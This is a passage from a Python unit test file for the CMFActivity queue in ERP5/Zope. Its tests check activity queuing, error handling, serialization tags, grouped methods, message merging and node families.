self.assertEqual(len(message_list), 1)\n self.assertEqual(message_list[0].method_id, 'getTitle')\n # Check that process_shutdown_thread was still runing when Queue_tic returned.\n self.assertTrue(queue_tic_test_dict.get('isAlive'), repr(queue_tic_test_dict))\n # Call tic in foreground. This must not lead to activity execution.\n activity_tool.tic()\n self.assertEqual(len(activity_tool.getMessageList()), 1)\n finally:\n # Put activity tool back in a working state\n try:\n cancelProcessShutdown()\n except StandardException:\n # If something failed in process_shutdown, shutdown lock might not\n # be taken in CMFActivity, leading to a new esception here hiding\n # test error.\n pass\n finally:\n del Organisation.waitingActivity\n SQLDict.dequeueMessage = original_dequeue\n self.tic()\n\n def test_hasActivity(self):\n active_object = self.portal.organisation_module.newContent(\n portal_type='Organisation')\n active_process = self.portal.portal_activities.newActiveProcess()\n self.tic()\n\n self.assertFalse(active_object.hasActivity())\n self.assertFalse(active_process.hasActivity())\n\n def test(obj, **kw):\n for activity in ActivityTool.activity_dict:\n active_object.activate(activity=activity, **kw).getTitle()\n self.commit()\n self.assertTrue(obj.hasActivity(), activity)\n self.tic()\n self.assertFalse(obj.hasActivity(), activity)\n\n test(active_object)\n test(active_process, active_process=active_process)\n test(active_process, active_process=active_process.getPath())\n\n @for_each_activity\n def test_hasErrorActivity_error(self, activity):\n # Monkey patch Organisation to add a failing method\n def failingMethod(self):\n raise ValueError('This method always fail')\n Organisation.failingMethod = failingMethod\n active_object = self.portal.organisation_module.newContent(\n portal_type='Organisation')\n active_process = self.portal.portal_activities.newActiveProcess()\n self.tic()\n\n\n self.assertFalse(active_object.hasErrorActivity())\n self.assertFalse(active_process.hasErrorActivity())\n\n active_object.activate(\n activity=activity, active_process=active_process).failingMethod()\n self.commit()\n # assert that any activity is created\n self.assertTrue(active_object.hasActivity())\n self.assertTrue(active_process.hasActivity())\n # assert that no error is reported\n self.assertFalse(active_object.hasErrorActivity())\n self.assertFalse(active_process.hasErrorActivity())\n self.flushAllActivities()\n # assert that any activity is created\n self.assertTrue(active_object.hasActivity())\n self.assertTrue(active_process.hasActivity())\n # assert that an error has been seen\n self.assertTrue(active_object.hasErrorActivity())\n self.assertTrue(active_process.hasErrorActivity())\n message, = self.getMessageList(activity)\n self.deleteMessageList(activity, [message])\n\n @for_each_activity\n def test_hasErrorActivity(self, activity):\n active_object = self.portal.organisation_module.newContent(\n portal_type='Organisation')\n active_process = self.portal.portal_activities.newActiveProcess()\n self.tic()\n\n self.assertFalse(active_object.hasErrorActivity())\n self.assertFalse(active_process.hasErrorActivity())\n\n active_object.activate(\n activity=activity, active_process=active_process).getTitle()\n self.commit()\n # assert that any activity is created\n self.assertTrue(active_object.hasActivity())\n self.assertTrue(active_process.hasActivity())\n # assert that no error is reported\n self.assertFalse(active_object.hasErrorActivity())\n self.assertFalse(active_process.hasErrorActivity())\n self.flushAllActivities()\n # assert that any activity is created\n self.assertFalse(active_object.hasActivity())\n self.assertFalse(active_process.hasActivity())\n # assert that no error is reported\n self.assertFalse(active_object.hasErrorActivity())\n self.assertFalse(active_process.hasErrorActivity())\n\n def test_active_object_hasActivity_does_not_catch_exceptions(self):\n \"\"\"\n Some time ago, hasActivity was doing a silent try/except, and this was\n a possible disaster for some projects. Here we make sure that if the\n SQL request fails, then the exception is not ignored\n \"\"\"\n active_object = self.portal.organisation_module.newContent(\n portal_type='Organisation')\n self.tic()\n self.assertFalse(active_object.hasActivity())\n\n # Monkey patch to induce any error artificially in the sql connection.\n def query(self, query_string,*args, **kw):\n raise ValueError\n\n from Products.ZMySQLDA.db import DB\n DB.original_query = DB.query\n try:\n active_object.activate().getTitle()\n self.commit()\n self.assertTrue(active_object.hasActivity())\n # Make the sql request not working\n DB.original_query = DB.query\n DB.query = query\n # Make sure then that hasActivity fails\n self.assertRaises(ValueError, active_object.hasActivity)\n finally:\n DB.query = DB.original_query\n del DB.original_query\n self.tic()\n\n def test_insert_max_payload(self):\n activity_tool = self.portal.portal_activities\n # XXX: For unknown reasons, this test runs faster after the tables are\n # recreated. We could also make this test run before all others.\n activity_tool.manageClearActivities()\n self.commit()\n max_allowed_packet = activity_tool.getSQLConnection().getMaxAllowedPacket()\n insert_list = []\n invoke_list = []\n N = 100\n class Skip(Exception):\n \"\"\"\n Speed up test by not interrupting the first transaction\n as soon as we have the information we want.\n \"\"\"\n original_query = six.get_unbound_function(DB.query)\n def query(self, query_string, *args, **kw):\n if query_string.startswith('INSERT'):\n insert_list.append(len(query_string))\n if not n:\n raise Skip\n return original_query(self, query_string, *args, **kw)\n def check():\n for i in xrange(1, N):\n activity_tool.activate(activity=activity, group_id=str(i)\n ).doSomething(arg)\n activity_tool.activate(activity=activity, group_id='~'\n ).doSomething(' ' * n)\n self.tic()\n self.assertEqual(len(invoke_list), N)\n invoke_list.remove(n)\n self.assertEqual(set(invoke_list), {len(arg)})\n del invoke_list[:]\n activity_tool.__class__.doSomething = \\\n lambda self, arg: invoke_list.append(len(arg))\n try:\n DB.query = query\n for activity in ActivityTool.activity_dict:\n arg = ' ' * (max_allowed_packet // N)\n # Find the size of the last message argument, such that all messages\n # are inserted in a single query whose size is to the maximum allowed.\n n = 0\n self.assertRaises(Skip, check)\n self.abort()\n n = max_allowed_packet - insert_list.pop()\n self.assertFalse(insert_list)\n # Now check with the biggest insert query possible.\n check()\n self.assertEqual(max_allowed_packet, insert_list.pop())\n self.assertFalse(insert_list)\n # And check that the insert query is split\n # in order not to exceed max_allowed_packet.\n n += 1\n check()\n self.assertEqual(len(insert_list), 2)\n del insert_list[:]\n finally:\n del activity_tool.__class__.doSomething\n DB.query = original_query\n\n def test_115_TestSerializationTagSQLDictPreventsParallelExecution(self):\n \"\"\"\n Test if there are multiple activities with the same serialization tag,\n then serialization tag guarantees that only one of the same serialization\n tagged activities can be processed at the same time.\n \"\"\"\n portal = self.portal\n activity_tool = portal.portal_activities\n\n # Add 6 activities\n portal.organisation_module.activate(activity='SQLDict', tag='', serialization_tag='test_115').getId()\n self.commit()\n portal.organisation_module.activate(activity='SQLDict', serialization_tag='test_115').getTitle()\n self.commit()\n portal.organisation_module.activate(activity='SQLDict', tag='tag_1', serialization_tag='test_115').getId()\n self.commit()\n portal.person_module.activate(activity='SQLDict', serialization_tag='test_115').getId()\n self.commit()\n portal.person_module.activate(activity='SQLDict', tag='tag_2').getId()\n self.commit()\n portal.organisation_module.activate(activity='SQLDict', tag='', serialization_tag='test_115').getId()\n self.commit()\n\n # distribute and assign them to 3 nodes\n activity_tool.distribute()\n self.commit()\n\n activity = ActivityTool.activity_dict['SQLDict']\n activity.getProcessableMessageList(activity_tool, 1, ())\n self.commit()\n activity.getProcessableMessageList(activity_tool, 2, ())\n self.commit()\n activity.getProcessableMessageList(activity_tool, 3, ())\n self.commit()\n\n result = activity._getMessageList(activity_tool.getSQLConnection())\n try:\n self.assertEqual(len([message\n for message in result\n if (message.processing_node>0 and\n message.serialization_tag=='test_115')]),\n 1)\n\n self.assertEqual(len([message\n for message in result\n if (message.processing_node==-1 and\n message.serialization_tag=='test_115')]),\n 4)\n\n self.assertEqual(len([message\n for message in result\n if (message.processing_node>0 and\n message.serialization_tag=='')]),\n 1)\n finally:\n # Clear activities from all nodes\n self.deleteMessageList('SQLDict', result)\n\n def test_116_RaiseInCommitBeforeMessageExecution(self):\n \"\"\"\n Test behaviour of CMFActivity when the commit just before message\n execution fails. In particular, it should restart the messages it\n selected (processing_node=current_node) instead of ignoring them forever.\n \"\"\"\n processed = []\n activity_tool = self.portal.portal_activities\n activity_tool.__class__.doSomething = processed.append\n try:\n for activity in ActivityTool.activity_dict:\n activity_tool.activate(activity=activity).doSomething(activity)\n self.commit()\n # Make first commit in dequeueMessage raise\n registerFailingTransactionManager()\n self.assertRaises(CommitFailed, activity_tool.tic)\n # Normally, the request stops here and Zope aborts the transaction\n self.abort()\n self.assertEqual(processed, [])\n # Activity is already reserved for current node. Check tic reselects it.\n activity_tool.tic()\n self.assertEqual(processed, [activity])\n del processed[:]\n finally:\n del activity_tool.__class__.doSomething\n\n def test_117_PlacelessDefaultReindexParameters(self):\n \"\"\"\n Test behaviour of PlacelessDefaultReindexParameters.\n \"\"\"\n portal = self.portal\n\n # Make a new Person object to make sure that the portal type\n # is migrated to an instance of a portal type class, otherwise\n # the portal type may generate an extra active object.\n portal.person_module.newContent(portal_type='Person')\n self.tic()\n\n original_reindex_parameters = portal.getPlacelessDefaultReindexParameters()\n if original_reindex_parameters is None:\n original_reindex_parameters = {}\n\n tag = 'SOME_RANDOM_TAG'\n activate_kw = original_reindex_parameters.get('activate_kw', {}).copy()\n activate_kw['tag'] = tag\n portal.setPlacelessDefaultReindexParameters(activate_kw=activate_kw, \\\n **original_reindex_parameters)\n current_default_reindex_parameters = portal.getPlacelessDefaultReindexParameters()\n self.assertEqual({'activate_kw': {'tag': tag}}, \\\n current_default_reindex_parameters)\n person = portal.person_module.newContent(portal_type='Person')\n self.commit()\n # as we specified it in setPlacelessDefaultReindexParameters we should have\n # an activity for this tags\n self.assertEqual(1, portal.portal_activities.countMessageWithTag(tag))\n self.tic()\n self.assertEqual(0, portal.portal_activities.countMessageWithTag(tag))\n\n # restore originals ones\n portal.setPlacelessDefaultReindexParameters(**original_reindex_parameters)\n person = portal.person_module.newContent(portal_type='Person')\n # .. now no messages with this tag should apper\n self.assertEqual(0, portal.portal_activities.countMessageWithTag(tag))\n\n @for_each_activity\n def testTryNotificationSavedOnEventLogWhenNotifyUserRaises(self, activity):\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n original_notifyUser = six.get_unbound_function(Message.notifyUser)\n def failSendingEmail(self, *args, **kw):\n raise MailHostError('Mail is not sent')\n activity_unit_test_error = Exception()\n def failingMethod(self):\n raise activity_unit_test_error\n try:\n Message.notifyUser = failSendingEmail\n Organisation.failingMethod = failingMethod\n self._catch_log_errors()\n obj.activate(activity=activity, priority=6).failingMethod()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n message, = self.getMessageList(activity)\n self.commit()\n for log_record in self.logged:\n if log_record.name == 'ActivityTool' and log_record.levelname == 'WARNING':\n type, value, trace = log_record.exc_info\n self.commit()\n self.assertIs(activity_unit_test_error, value)\n self.deleteMessageList(activity, [message])\n finally:\n Message.notifyUser = original_notifyUser\n del Organisation.failingMethod\n self._ignore_log_errors()\n\n @for_each_activity\n def testNotificationFailureIsNotSavedOnEventLogWhenMailNotificationIsDisabled(self, activity):\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n original_notifyUser = six.get_unbound_function(Message.notifyUser)\n def failSendingEmail(self, *args, **kw):\n raise MailHostError('Mail is not sent')\n activity_unit_test_error = Exception()\n def failingMethod(self):\n raise activity_unit_test_error\n try:\n self.portal.portal_activities.activity_failure_mail_notification = False\n Message.notifyUser = failSendingEmail\n Organisation.failingMethod = failingMethod\n self._catch_log_errors()\n obj.activate(activity=activity, priority=6).failingMethod()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n message, = self.getMessageList(activity)\n self.commit()\n for log_record in self.logged:\n if log_record.name == 'ActivityTool' and log_record.levelname == 'WARNING':\n type, value, trace = log_record.exc_info\n self.commit()\n self.assertIs(activity_unit_test_error, value)\n self.deleteMessageList(activity, [message])\n finally:\n self.portal.portal_activities.activity_failure_mail_notification = True\n Message.notifyUser = original_notifyUser\n del Organisation.failingMethod\n self._ignore_log_errors()\n\n\n\n @for_each_activity\n def testTryUserMessageContainingNoTracebackIsStillSent(self, activity):\n # With Message.__call__\n # 1: activity context does not exist when activity is executed\n obj = self.portal.organisation_module.newContent(portal_type='Organisation')\n self.tic()\n notification_done = []\n def fake_notifyUser(self, *args, **kw):\n notification_done.append(True)\n self.traceback = None\n original_notifyUser = Message.notifyUser\n def failingMethod(self):\n raise ValueError(\"This method always fail\")\n Message.notifyUser = fake_notifyUser\n Organisation.failingMethod = failingMethod\n try:\n obj.activate(activity=activity).failingMethod()\n self.commit()\n self.flushAllActivities(silent=1, loop_size=100)\n message, = self.getMessageList(activity)\n self.assertEqual(len(notification_done), 1)\n self.assertEqual(message.traceback, None)\n message(self.getActivityTool())\n self.deleteMessageList(activity, [message])\n finally:\n Message.notifyUser = original_notifyUser\n del Organisation.failingMethod\n\n @for_each_activity\n def testTryNotificationSavedOnEventLogWhenSiteErrorLoggerRaises(self, activity):\n # Make sure that no active object is installed.\n o = self.getOrganisation()\n class ActivityUnitTestError(Exception):\n pass\n activity_unit_test_error = ActivityUnitTestError()\n def failingMethod(self):\n raise activity_unit_test_error\n from Products.SiteErrorLog.SiteErrorLog import SiteErrorLog\n original_raising = six.get_unbound_function(SiteErrorLog.raising)\n\n # Monkey patch Site Error to induce conflict errors artificially.\n def raising(self, info):\n raise AttributeError\n try:\n SiteErrorLog.raising = raising\n Organisation.failingMethod = failingMethod\n self._catch_log_errors()\n o.activate(activity = activity).failingMethod()\n self.commit()\n message, = self.getMessageList(activity)\n self.flushAllActivities(silent = 1)\n SiteErrorLog.raising = original_raising\n self.commit()\n for log_record in self.logged:\n if log_record.name == 'ActivityTool' and log_record.levelname == 'WARNING':\n type, value, trace = log_record.exc_info\n self.assertIs(activity_unit_test_error, value)\n self.deleteMessageList(activity, [message])\n finally:\n SiteErrorLog.raising = original_raising\n del Organisation.failingMethod\n self._ignore_log_errors()\n\n def test_128_CheckDistributeWithSerializationTagAndGroupMethodId(self):\n activity_tool = self.portal.portal_activities\n obj1 = activity_tool.newActiveProcess()\n obj2 = activity_tool.newActiveProcess()\n self.tic()\n group_method_call_list = []\n def doSomething(self, message_list):\n r = []\n for m in message_list:\n m.result = r.append((m.object.getPath(), m.args, m.kw))\n r.sort()\n group_method_call_list.append(r)\n activity_tool.__class__.doSomething = doSomething\n try:\n for activity in ActivityTool.activity_dict:\n activity_kw = dict(activity=activity, serialization_tag=self.id(),\n group_method_id='portal_activities/doSomething')\n obj1.activate(**activity_kw).dummy(1, x=None)\n obj2.activate(**activity_kw).dummy(2, y=None)\n self.commit()\n activity_tool.distribute()\n activity_tool.tic()\n self.assertEqual(group_method_call_list.pop(),\n sorted([(obj1.getPath(), (1,), dict(x=None)),\n (obj2.getPath(), (2,), dict(y=None))]))\n self.assertFalse(group_method_call_list)\n self.assertFalse(activity_tool.getMessageList())\n obj1.activate(priority=2, **activity_kw).dummy1(1, x=None)\n obj1.activate(priority=1, **activity_kw).dummy2(2, y=None)\n message1 = obj1.getPath(), (1,), dict(x=None)\n message2 = obj1.getPath(), (2,), dict(y=None)\n self.commit()\n activity_tool.distribute()\n self.assertEqual(len(activity_tool.getMessageList()), 2)\n activity_tool.tic()\n self.assertEqual(group_method_call_list.pop(),\n [message2] if activity != 'SQLQueue' else [message1, message2])\n self.assertFalse(group_method_call_list)\n finally:\n del activity_tool.__class__.doSomething\n\n def test_129_beforeCommitHook(self):\n \"\"\"\n Check it is possible to activate an object from a before commit hook\n \"\"\"\n def doSomething(person):\n person.activate(activity='SQLDict')._setFirstName('John')\n person.activate(activity='SQLQueue')._setLastName('Smith')\n person = self.portal.person_module.newContent()\n transaction.get().addBeforeCommitHook(doSomething, (person,))\n self.tic()\n self.assertEqual(person.getTitle(), 'John Smith')\n\n def test_connection_migration(self):\n \"\"\"\n Make sure the cmf_activity_sql_connection is automatically migrated from\n the ZMySQLDA Connection class to ActivityConnection\n \"\"\"\n # replace the activity connector with a standard ZMySQLDA one\n portal = self.portal\n activity_tool = portal.portal_activities\n stdconn = portal.cmf_activity_sql_connection\n portal._delObject('cmf_activity_sql_connection')\n portal.manage_addProduct['ZMySQLDA'].manage_addZMySQLConnection(\n stdconn.id,\n stdconn.title,\n stdconn.connection_string,\n )\n oldconn = portal.cmf_activity_sql_connection\n self.assertEqual(oldconn.meta_type, 'Z MySQL Database Connection')\n # force rebootstrap and check that migration of the connection happens\n # automatically\n from Products.ERP5Type.dynamic import portal_type_class\n portal_type_class._bootstrapped.clear()\n portal_type_class.synchronizeDynamicModules(activity_tool, True)\n activity_tool.activate(activity='SQLQueue').getId()\n self.tic()\n newconn = portal.cmf_activity_sql_connection\n self.assertEqual(newconn.meta_type, 'CMFActivity Database Connection')\n\n def test_connection_installable(self):\n \"\"\"\n Test if the cmf_activity_sql_connector can be installed\n \"\"\"\n # delete the activity connection\n portal = self.portal\n stdconn = portal.cmf_activity_sql_connection\n portal._delObject('cmf_activity_sql_connection')\n # check the installation form can be rendered\n portal.manage_addProduct['CMFActivity'].connectionAdd(\n portal.REQUEST\n )\n # check it can be installed\n portal.manage_addProduct['CMFActivity'].manage_addActivityConnection(\n stdconn.id,\n stdconn.title,\n stdconn.connection_string\n )\n newconn = portal.cmf_activity_sql_connection\n self.assertEqual(newconn.meta_type, 'CMFActivity Database Connection')\n\n def test_connection_sortkey(self):\n \"\"\"\n Check that SQL connection has properly initialized sort key,\n even when its container (ZODB connection) is reused by another thread.\n \"\"\"\n def sortKey():\n app = ZopeTestCase.app()\n try:\n c = app[self.getPortalName()].cmf_activity_sql_connection()\n return app._p_jar, c.sortKey()\n finally:\n ZopeTestCase.close(app)\n jar, sort_key = sortKey()\n self.assertNotEqual(1, sort_key)\n result = []\n t = threading.Thread(target=lambda: result.extend(sortKey()))\n t.daemon = True\n t.start()\n t.join()\n self.assertIs(result[0], jar)\n self.assertEqual(result[1], sort_key)\n\n def test_onErrorCallback(self):\n activity_tool = self.portal.portal_activities\n obj = activity_tool.newActiveProcess()\n self.tic()\n def _raise(exception): # I wish exceptions are callable raising themselves\n raise exception\n def doSomething(self, conflict_error, cancel):\n self.activity_count += 1\n error = ConflictError() if conflict_error else Exception()\n def onError(exc_type, exc_value, traceback):\n assert exc_value is error\n env = self.getActivityRuntimeEnvironment()\n weakref_list.extend(map(weakref.ref, (env, env._message)))\n self.on_error_count += 1\n return cancel\n self.getActivityRuntimeEnvironment().edit(on_error_callback=onError)\n if not self.on_error_count:\n if not conflict_error:\n raise error\n transaction.get().addBeforeCommitHook(_raise, (error,))\n obj.__class__.doSomething = doSomething\n try:\n for activity in ActivityTool.activity_dict:\n for conflict_error in False, True:\n weakref_list = []\n obj.activity_count = obj.on_error_count = 0\n obj.activate(activity=activity).doSomething(conflict_error, True)\n self.tic()\n self.assertEqual(obj.activity_count, 0)\n self.assertEqual(obj.on_error_count, 1)\n gc.collect()\n self.assertEqual([x() for x in weakref_list], [None, None])\n weakref_list = []\n obj.activate(activity=activity).doSomething(conflict_error, False)\n obj.on_error_count = 0\n self.tic()\n self.assertEqual(obj.activity_count, 1)\n self.assertEqual(obj.on_error_count, 1)\n gc.collect()\n self.assertEqual([x() for x in weakref_list], [None, None])\n finally:\n del obj.__class__.doSomething\n\n def test_duplicateGroupedMessage(self):\n activity_tool = self.portal.portal_activities\n obj = activity_tool.newActiveProcess()\n obj.reindexObject(activate_kw={'tag': 'foo', 'after_tag': 'bar'})\n self.commit()\n # Check that both messages were inserted.\n # Also serves as a sanity check on indexation activities group_method_id.\n indexation_group_metdod_id = 'portal_catalog/catalogObjectList'\n self.assertEqual(\n len([\n x\n for x in activity_tool.getMessageList(path=obj.getPath())\n if x.activity_kw.get('group_method_id') == indexation_group_metdod_id\n ]),\n 2,\n )\n invoked = []\n def invokeGroup(self, method_id, message_list, *args):\n # Ignore any other activity which may be spawned from these catalog\n # indexations (ex: fulltext indexations).\n if method_id == indexation_group_metdod_id:\n invoked.append(len(message_list))\n return ActivityTool_invokeGroup(self, method_id, message_list, *args)\n ActivityTool_invokeGroup = activity_tool.__class__.invokeGroup\n try:\n activity_tool.__class__.invokeGroup = invokeGroup\n self.tic()\n finally:\n activity_tool.__class__.invokeGroup = ActivityTool_invokeGroup\n self.assertEqual(invoked, [1])\n\n def test_mergeParent(self):\n category_tool = self.portal.portal_categories\n # Test data: c0\n # / \\\n # c1 c2\n # / \\ |\n # c3 c4 c5\n c = [category_tool.newContent()]\n for i in xrange(5):\n c.append(c[i//2].newContent())\n self.tic()\n def activate(i, priority=1, **kw):\n kw.setdefault('merge_parent', c[0].getPath())\n c[i].activate(priority=priority, **kw).doSomething()\n def check(*expected):\n self.tic()\n self.assertEqual(tuple(invoked), expected)\n del invoked[:]\n invoked = []\n def doSomething(self):\n invoked.append(c.index(self))\n Base.doSomething = doSomething\n try:\n for t in (0, 1), (0, 4, 2), (1, 0, 5), (3, 2, 0):\n for p, i in enumerate(t):\n activate(i, p)\n check(0)\n activate(1, 0); activate(5, 1); check(1, 5)\n activate(3, 0); activate(1, 1); check(1)\n activate(2, 0); activate(1, 1); activate(4, 2); check(2, 1)\n activate(4, 0); activate(5, 1); activate(3, 2); check(4, 5, 3)\n activate(3, 0, merge_parent=c[1].getPath()); activate(0, 1); check(3, 0)\n # Following test shows that a child can be merged with a parent even if\n # 'merge_parent' is not specified. This can't be avoided without loading\n # all found duplicates, which would be bad for performance.\n activate(0, 0); activate(4, 1, merge_parent=None); check(0)\n finally:\n del Base.doSomething\n def activate(i, priority=1, **kw):\n c[i].activate(group_method_id='portal_categories/invokeGroup',\n merge_parent=c[(i-1)//2 or i].getPath(),\n priority=priority, **kw).doSomething()\n def invokeGroup(self, message_list):\n r = []\n for m in message_list:\n m.result = r.append(c.index(m.object))\n r.sort()\n invoked.append(r)\n category_tool.__class__.invokeGroup = invokeGroup\n try:\n activate(5, 0); activate(1, 1); check([1, 5])\n activate(4, 0); activate(1, 1); activate(2, 0); check([1, 2])\n activate(1, 0); activate(5, 0); activate(3, 1); check([1, 5])\n for p, i in enumerate((5, 3, 2, 1, 4)):\n activate(i, p, group_id=str(2 != i != 5))\n check([2], [1])\n for cost in 0.3, 0.1:\n activate(2, 0, group_method_cost=cost)\n activate(3, 1); activate(4, 2); activate(1, 3)\n check([1, 2])\n finally:\n del category_tool.__class__.invokeGroup\n category_tool._delObject(c[0].getId())\n self.tic()\n\n def test_getMessageList(self):\n activity_tool = self.portal.portal_activities\n module = self.portal.person_module\n module.activate(after_tag=\"foo\").getUid()\n module.activate(activity='SQLQueue', tag=\"foo\").getId()\n activity_tool.activate(priority=-1).getId()\n def check(expected, **kw):\n self.assertEqual(expected, len(activity_tool.getMessageList(**kw)))\n def test(check=lambda _, **kw: check(0, **kw)):\n check(2, path=module.getPath())\n check(3, method_id=(\"getId\", \"getUid\"))\n check(1, tag=\"foo\")\n check(0, tag=\"foo\", method_id=\"getUid\")\n check(1, processing_node=-1)\n check(3, processing_node=range(-5,5))\n test()\n self.commit()\n test(check)\n self.tic()\n test()\n\n def test_MessageNonExecutable(self):\n message_list = self.portal.MailHost._message_list\n del message_list[:]\n activity_tool = self.portal.portal_activities\n\n kw = {}\n self._catch_log_errors()\n try:\n activity_tool.activity_failure_mail_notification = True\n for kw['activity'] in ActivityTool.activity_dict:\n for kw['group_method_id'] in '', None:\n obj = activity_tool.newActiveProcess()\n self.tic()\n obj.activate(**kw).getId()\n activity_tool._delOb(obj.getId())\n obj = activity_tool.newActiveProcess(id=obj.getId(),\n is_indexable=False)\n self.commit()\n self.assertEqual(1, activity_tool.countMessage())\n self.flushAllActivities()\n sender, recipients, mail = message_list.pop()\n self.assertIn('UID mismatch', mail)\n m, = activity_tool.getMessageList()\n self.assertEqual(m.processing_node, INVOKE_ERROR_STATE)\n obj.flushActivity()\n obj.activate(**kw).getId()\n activity_tool._delOb(obj.getId())\n self.commit()\n self.assertEqual(1, activity_tool.countMessage())\n activity_tool.tic()\n cmf_activty_log, = [log for log in self.logged if 'CMFActivity' in log.name]\n self.logged = []\n self.assertIn('no object found', cmf_activty_log.getMessage())\n finally:\n self._ignore_log_errors()\n self.assertFalse(message_list)\n\n def test_activateByPath(self):\n organisation = self.getOrganisation()\n self.portal.portal_activities.activateObject(\n organisation.getPath(),\n activity='SQLDict',\n active_process=None\n ).getTitle()\n self.tic()\n\n def test_activateOnZsqlBrain(self):\n organisation, = self.getOrganisationModule().searchFolder(\n id=self.company_id)\n organisation.activate().getTitle()\n self.tic()\n\n def test_flushActivitiesOnDelete(self):\n organisation = self.getOrganisation()\n organisation.getParentValue()._delObject(organisation.getId())\n organisation.activate().getTitle()\n self.tic()\n\n def test_flushActivitiesOnDeleteWithAcquierableObject(self):\n # Create an object with the same ID that can be acquired\n self.portal._setObject(self.company_id, Organisation(self.company_id))\n\n organisation = self.getOrganisation()\n organisation.getParentValue()._delObject(organisation.getId())\n organisation.reindexObject()\n self.tic()\n\n def test_failingGroupMethod(self):\n activity_tool = self.portal.portal_activities\n obj = activity_tool.newActiveProcess()\n self.tic()\n obj.x = 1\n def doSomething(self):\n self.x %= self.x\n obj.__class__.doSomething = doSomething\n try:\n activity_kw = dict(activity=\"SQLQueue\", group_method_id=None)\n obj.activate(**activity_kw).doSomething()\n obj.activate(**activity_kw).doSomething()\n obj.activate(**activity_kw).doSomething()\n self.commit()\n self.assertEqual(3, len(activity_tool.getMessageList()))\n activity_tool.tic()\n self.assertEqual(obj.x, 0)\n skipped, failed = activity_tool.getMessageList()\n self.assertEqual(0, skipped.retry)\n self.assertEqual(1, failed.retry)\n obj.x = 1\n self.commit()\n activity_tool.timeShift(VALIDATION_ERROR_DELAY)\n activity_tool.tic()\n m, = activity_tool.getMessageList()\n self.assertEqual(1, failed.retry)\n obj.x = 1\n self.commit()\n activity_tool.timeShift(VALIDATION_ERROR_DELAY)\n activity_tool.tic()\n finally:\n del obj.__class__.doSomething\n\n def test_restrictedGroupMethod(self):\n skin = self.portal.portal_skins.custom\n script_id = self.id()\n script = createZODBPythonScript(skin, script_id, \"message_list\", \"\"\"if 1:\n for m in message_list:\n m.result = m.object.getProperty(*m.args, **m.kw)\n \"\"\")\n script.manage_proxy((\"Manager\",))\n obj = self.portal.portal_activities.newActiveProcess(causality_value_list=(\n self.portal.person_module, self.portal.organisation_module))\n obj.manage_permission('Access contents information', ['Manager'])\n self.logout()\n foo = obj.activate(activity='SQLQueue',\n group_method_id=script_id,\n active_process=obj.getPath()).foo\n foo('causality', portal_type='Organisation Module')\n foo('stop_date', 'bar')\n self.tic()\n self.assertEqual(sorted(x.getResult() for x in obj.getResultList()),\n ['bar', 'organisation_module'])\n skin.manage_delObjects([script_id])\n self.tic()\n\n def test_getCurrentNode(self):\n current_node = getattr(getConfiguration(), 'product_config', {}) \\\n .get('cmfactivity', {}).get('node-id')\n if not current_node:\n current_node = getServerAddress()\n node = getCurrentNode()\n self.assertEqual(node, current_node)\n activity_node = self.portal.portal_activities.getCurrentNode()\n self.assertEqual(activity_node, current_node)\n\n def test_getServerAddress(self):\n host, port = self.startHTTPServer()\n ip = socket.gethostbyname(host)\n server_address = '%s:%s' % (ip, port)\n address = getServerAddress()\n self.assertEqual(address, server_address)\n activity_address = self.portal.portal_activities.getServerAddress()\n self.assertEqual(activity_address, server_address)\n\n def test_nodePreference(self):\n \"\"\"\n Test node preference, i.e. 'node' parameter of activate()\n An object is activated by 2 different nodes and the 2 messages are\n processed by the node that created the newest one:\n - without node preference: they're ordered by date\n - with node preference: they're executed in reverse order (the\n processing node executes its message first even if it's newer)\n Correct ordering of queues is also checked, by including scenarios\n in which one message is in SQLDict and the other in SQLQueue.\n \"\"\"\n activity_tool = self.portal.portal_activities\n o = self.getOrganisation()\n\n node_dict = dict(activity_tool.getNodeDict())\n assert len(node_dict) == 1 and '' not in node_dict, node_dict\n before = DateTime() - 1\n\n activities = 'SQLDict', 'SQLQueue'\n for activities in product(activities, activities):\n for node, expected in (None, '12'), ('', '21'), ('same', '12'):\n o._setTitle('0')\n # The dance around getNodeDict is to simulate the creation of\n # activities from 2 different nodes. We also change title in 2\n # different ways, so that SQLDict does not merge them.\n o.activate(activity=activities[0], node=node)._setTitle('1')\n activity_tool.getNodeDict = lambda: node_dict\n node_dict[''] = ActivityTool.ROLE_PROCESSING\n o.activate(activity=activities[1], node=node, at_date=before\n )._setProperty('title', '2')\n del node_dict['']\n activity_tool._p_invalidate()\n self.commit()\n\n for title in expected:\n self.ticOnce()\n self.assertEqual(o.getTitle(), title, (activities, expected))\n self.assertFalse(activity_tool.getMessageList())\n\n def test_nodeFamilies(self):\n \"\"\"\n Test node families, i.e. 'node' parameter of activate() beyond \"\", \"same\"\n and None.\n \"\"\"\n activity_tool = self.portal.portal_activities\n node_id, = activity_tool.getNodeDict()\n other = 'boo'\n member = 'foo'\n non_member = 'bar'\n does_not_exist = 'baz'\n\n # Family declaration API\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [])\n self.assertRaises(\n ValueError,\n activity_tool.createFamily, 'same', # Reserved name\n )\n self.assertRaises(\n TypeError,\n activity_tool.createFamily, -5, # Not a string\n )\n activity_tool.createFamily(other)\n self.assertRaises(\n ValueError,\n activity_tool.createFamily, other, # Exists\n )\n activity_tool.createFamily(member)\n self.assertRaises(\n ValueError,\n activity_tool.renameFamily, other, member, # New name exists\n )\n self.assertRaises(\n ValueError,\n activity_tool.renameFamily, does_not_exist, member, # Old name does not exist\n )\n self.assertRaises(\n TypeError,\n activity_tool.renameFamily, other, -4, # New name not a string\n )\n activity_tool.deleteFamily(member)\n # Silent success\n activity_tool.deleteFamily(member)\n activity_tool.createFamily(non_member)\n self.assertItemsEqual(activity_tool.getFamilyNameList(), [other, non_member])\n\n # API for node a-/di-ssociation with/from families\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [])\n activity_tool.addNodeToFamily(node_id, other)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other])\n # Silent success\n activity_tool.addNodeToFamily(node_id, other)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other])\n activity_tool.addNodeToFamily(node_id, non_member)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other, non_member])\n activity_tool.removeNodeFromFamily(node_id, non_member)\n self.assertItemsEqual(activity_tool.getCurrentNodeFamilyNameSet(), [other])\n # Silent success\n 